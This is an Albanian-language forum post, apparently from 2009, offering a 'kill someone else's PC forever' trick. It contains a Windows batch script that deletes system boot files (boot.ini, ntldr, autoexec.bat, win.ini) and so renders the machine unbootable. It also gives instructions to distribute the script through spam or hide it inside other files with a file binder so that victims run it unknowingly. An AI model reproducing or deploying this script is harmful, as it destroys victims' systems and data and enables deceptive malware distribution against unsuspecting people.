Mir Se Erdhet Ne Forumin Dj Erjoni

Shikim Te Kendshem
 
ForumFaqa StartueseGalleryCalendarPytėsoriKėrkoRegjistrohuLista AnėtarėveGrupet e Anėtarėveidentifikimi

Share | 
 

 Fike nje PC te huaj ... pergjithmon! Funksionon 100%

Shko poshtė 
AutoriMesazh
Admin
Dj-Erjoni
Dj-Erjoni
avatar

Numri i postimeve : 420
Registration date : 01/11/2007

MesazhTitulli: Fike nje PC te huaj ... pergjithmon! Funksionon 100%   Sun Feb 01, 2009 11:37 am

Fillimisht ,unė nuk mbajė pėrgjegjsi per dėmet qė mundė ti shkaktoni ju.

Hapim Notepadin dhe vendosim kėtė kodė:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


E ruajmė kėtė fajll me C'fardo emri mirpo me prapashtesen .bat pra emri.bat

Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.

Kujdes! Mos e hapni kėtė fajll ne PC tuaj.

Tani ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder.
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://dj-erjoni.albanianforum.net
 
Fike nje PC te huaj ... pergjithmon! Funksionon 100%
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Mir Se Erdhet Ne Forumin Dj Erjoni :: Shkarkime-
Kėrce tek: